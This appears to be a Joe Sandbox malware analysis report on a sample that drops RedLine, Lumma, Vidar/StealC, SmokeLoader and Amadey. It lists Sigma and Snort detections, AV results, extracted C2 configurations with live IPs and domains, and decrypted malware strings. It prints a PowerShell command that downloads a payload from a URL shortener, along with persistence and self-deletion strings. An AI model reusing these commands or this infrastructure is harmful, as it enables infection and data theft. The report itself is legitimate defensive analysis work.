Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null", CommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c ins.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7920, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null", ProcessId: 7888, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\system32\svchost.exe -k LocalService -s W32Time, CommandLine: C:\Windows\system32\svchost.exe -k LocalService -s W32Time, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\system32\svchost.exe -k LocalService -s W32Time, ProcessId: 1460, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Powershell downloading file from url shortener site

Source: Process started

Author: Joe Security: Data: Command: powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null", CommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c ins.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7920, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null", ProcessId: 7888, ProcessName: powershell.exe

Snort Signatures

ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (facilitycoursedw .shop) - Source IP: 192.168.2.7 - Destination IP: 1.1.1.1

Timestamp:	06/27/24-05:58:37.704225
SID:	2053754
Source Port:	53318
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (computerexcudesp .shop) - Source IP: 192.168.2.7 - Destination IP: 1.1.1.1

Timestamp:	06/27/24-05:58:37.729906
SID:	2053762
Source Port:	57525
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC - Id1Response - Source IP: 185.215.113.67 - Destination IP: 192.168.2.7

Timestamp:	06/27/24-05:58:15.515792
SID:	2043234
Source Port:	40960
Destination Port:	49707
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (disappointcredisotw .shop) - Source IP: 192.168.2.7 - Destination IP: 1.1.1.1

Timestamp:	06/27/24-05:58:37.777945
SID:	2053764
Source Port:	57877
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (publicitycharetew .shop) - Source IP: 192.168.2.7 - Destination IP: 1.1.1.1

Timestamp:	06/27/24-05:58:37.718326
SID:	2053752
Source Port:	63750
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) - Source IP: 185.215.113.67 - Destination IP: 192.168.2.7

Timestamp:	06/27/24-05:58:20.860334
SID:	2046056
Source Port:	40960
Destination Port:	49707
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (bargainnygroandjwk .shop) - Source IP: 192.168.2.7 - Destination IP: 1.1.1.1

Timestamp:	06/27/24-05:58:37.765217
SID:	2053756
Source Port:	64031
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (doughtdrillyksow .shop) - Source IP: 192.168.2.7 - Destination IP: 1.1.1.1

Timestamp:	06/27/24-05:58:37.789371
SID:	2053750
Source Port:	56103
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (injurypiggyoewirog .shop) - Source IP: 192.168.2.7 - Destination IP: 1.1.1.1

Timestamp:	06/27/24-05:58:37.751929
SID:	2053758
Source Port:	59643
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) - Source IP: 192.168.2.7 - Destination IP: 185.215.113.67

Timestamp:	06/27/24-05:58:15.193395
SID:	2046045
Source Port:	49707
Destination Port:	40960
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 185.215.113.67

Timestamp:	06/27/24-05:58:29.559593
SID:	2043231
Source Port:	49707
Destination Port:	40960
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (leafcalfconflcitw .shop) - Source IP: 192.168.2.7 - Destination IP: 1.1.1.1

Timestamp:	06/27/24-05:58:37.741678
SID:	2053760
Source Port:	56934
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://185.172.128.116/Mb3GvQs8/index.phpIN	Avira URL Cloud: Label: phishing
Source: https://facilitycoursedw.shop/api$	Avira URL Cloud: Label: malware
Source: http://65.21.175.0	Avira URL Cloud: Label: malware
Source: http://77.91.77.81/Kiru9gu/index.phpe	Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/lend/123.exed4	Avira URL Cloud: Label: phishing
Source: http://65.21.175.0/108e010e8f91c38c.phpWC	Avira URL Cloud: Label: malware
Source: http://65.21.175.0/b13597c85f807692/msvcp140.dllEM	Avira URL Cloud: Label: malware
Source: https://iplogger.co/1lLub-&	Avira URL Cloud: Label: malware
Source: http://qeqei.xyz/tmp/	Avira URL Cloud: Label: malware
Source: https://facilitycoursedw.shop/apii	Avira URL Cloud: Label: malware
Source: http://185.172.128.116/Mb3GvQs8/index.phpFa	Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/Kiru9gu/index.phptch	Avira URL Cloud: Label: phishing
Source: https://doughtdrillyksow.shop/	Avira URL Cloud: Label: malware
Source: https://bargainnygroandjwk.shop/	Avira URL Cloud: Label: malware
Source: http://65.21.175.0/b13597c85f807692/msvcp140.dll	Avira URL Cloud: Label: malware
Source: http://185.172.128.116/erences.SourceAumid	Avira URL Cloud: Label: phishing
Source: http://65.21.175.0/b13597c85f807692/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://65.21.175.0/b13597c85f807692/vcruntime140.dllka	Avira URL Cloud: Label: malware
Source: http://65.21.175.0/b13597c85f807692/nss3.dllal	Avira URL Cloud: Label: malware
Source: https://iplogger.co/1lLub%	Avira URL Cloud: Label: malware

Found malware configuration

Source: 1Vkf7silOj.exe	Malware Configuration Extractor: RedLine {"C2 url": ["185.215.113.67:40960"], "Bot Id": "123", "Authorization Header": "d6fe06e6d618e4a9e38420480ea2db60"}
Source: 00000034.00000002.1966115508.000000006B6EE000.00000004.00000001.01000000.00000020.sdmp	Malware Configuration Extractor: Vidar {"C2 url": "http://65.21.175.0/108e010e8f91c38c.php"}
Source: 00000021.00000002.2005785440.00000000023E0000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://movlat.com/tmp/", "http://llcbc.org/tmp/", "http://lindex24.ru/tmp/", "http://qeqei.xyz/tmp/"]}
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	Malware Configuration Extractor: Amadey {"C2 url": "o7labs.top/online/support/index.php", "Version": "4.31"}
Source: aspnet_regiis.exe.8196.54.memstrmin	Malware Configuration Extractor: StealC {"C2 url": "65.21.175.0/108e010e8f91c38c.php"}

Multi AV Scanner detection for domain / URL

Source: http://77.91.77.81/Kiru9gu/index.phpe	Virustotal: Detection: 16%	Perma Link
Source: http://qeqei.xyz/tmp/	Virustotal: Detection: 14%	Perma Link
Source: https://facilitycoursedw.shop/apii	Virustotal: Detection: 9%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\ldr[1].exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\whiteheroin[1].exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\1[1].exe	ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\alex5555555[1].exe	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\gold[1].exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\Installer[1].exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\vcf-to-csv-converter[1].exe	ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\123[1].exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\NewLatest[1].exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\1000020001\1.exe	ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\1000108001\ldr.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\1000109001\alex5555555.exe	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\1000111001\O3B6wY7ZkFhh.exe	ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\28feeece5c\Hkbsse.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\6.exe	ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	ReversingLabs: Detection: 59%
Source: C:\Users\user\AppData\Roaming\d3d9.dll	ReversingLabs: Detection: 50%

Multi AV Scanner detection for submitted file

Source: 1Vkf7silOj.exe	ReversingLabs: Detection: 68%
Source: 1Vkf7silOj.exe	Virustotal: Detection: 63%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\whiteheroin[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\ldr[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\gold[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\NewLatest[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\vcf-to-csv-converter[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\123[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\1[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\alex5555555[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 1Vkf7silOj.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: o7labs.top
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: /online/support/index.php
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: S-%lu-
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: 28feeece5c
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: Hkbsse.exe
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: Startup
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: cmd /C RMDIR /s/q
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: rundll32
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: Programs
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: %USERPROFILE%
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: cred.dll\|clip.dll\|
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: http://
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: https://
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: /Plugins/
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: &unit=
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: shell32.dll
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: kernel32.dll
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: GetNativeSystemInfo
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: ProgramData\
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: AVAST Software
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: Kaspersky Lab
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: Panda Security
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: Doctor Web
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: 360TotalSecurity
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: Bitdefender
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: Norton
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: Sophos
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: Comodo
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: WinDefender
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: 0123456789
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: ------
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: ?scr=1
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: ComputerName
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: -unicode-
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: VideoID
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: DefaultSettings.XResolution
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: DefaultSettings.YResolution
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: ProductName
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: CurrentBuild
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: rundll32.exe
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: "taskkill /f /im "
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: " && timeout 1 && del
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: && Exit"
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: " && ren
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: Powershell.exe
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: -executionpolicy remotesigned -File "
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: shutdown -s -t 0
Source: 35.2.Hkbsse.exe.6d0000.0.unpack	String decryptor: random
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: INSERT_KEY_HERE
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GetProcAddress
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: LoadLibraryA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: lstrcatA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: OpenEventA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: CreateEventA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: CloseHandle
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: Sleep
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GetUserDefaultLangID
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: VirtualAllocExNuma
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: VirtualFree
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GetSystemInfo
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: VirtualAlloc
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: HeapAlloc
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GetComputerNameA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: lstrcpyA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GetProcessHeap
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GetCurrentProcess
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: lstrlenA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: ExitProcess
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GlobalMemoryStatusEx
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GetSystemTime
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: SystemTimeToFileTime
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: advapi32.dll
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: gdi32.dll
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: user32.dll
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: crypt32.dll
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: ntdll.dll
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GetUserNameA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: CreateDCA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GetDeviceCaps
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: ReleaseDC
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: CryptStringToBinaryA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: sscanf
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: VMwareVMware
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: HAL9TH
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: JohnDoe
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: DISPLAY
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: %hu/%hu/%hu
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: http://65.21.175.0
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: /108e010e8f91c38c.php
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: /b13597c85f807692/
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: jopa
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GetEnvironmentVariableA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GetFileAttributesA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GlobalLock
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: HeapFree
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GetFileSize
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GlobalSize
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: IsWow64Process
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: Process32Next
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GetLocalTime
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: FreeLibrary
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GetTimeZoneInformation
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GetSystemPowerStatus
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GetVolumeInformationA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GetWindowsDirectoryA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: Process32First
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GetLocaleInfoA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GetUserDefaultLocaleName
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GetModuleFileNameA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: DeleteFileA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: FindNextFileA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: LocalFree
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: FindClose
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: SetEnvironmentVariableA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: LocalAlloc
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GetFileSizeEx
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: ReadFile
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: SetFilePointer
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: WriteFile
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: CreateFileA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: FindFirstFileA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: CopyFileA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: VirtualProtect
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GetLastError
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: lstrcpynA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: MultiByteToWideChar
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GlobalFree
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: WideCharToMultiByte
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GlobalAlloc
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: OpenProcess
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: TerminateProcess
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GetCurrentProcessId
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: gdiplus.dll
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: ole32.dll
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: bcrypt.dll
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: wininet.dll
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: shlwapi.dll
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: shell32.dll
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: psapi.dll
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: rstrtmgr.dll
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: CreateCompatibleBitmap
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: SelectObject
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: BitBlt
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: DeleteObject
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: CreateCompatibleDC
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GdipGetImageEncodersSize
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GdipGetImageEncoders
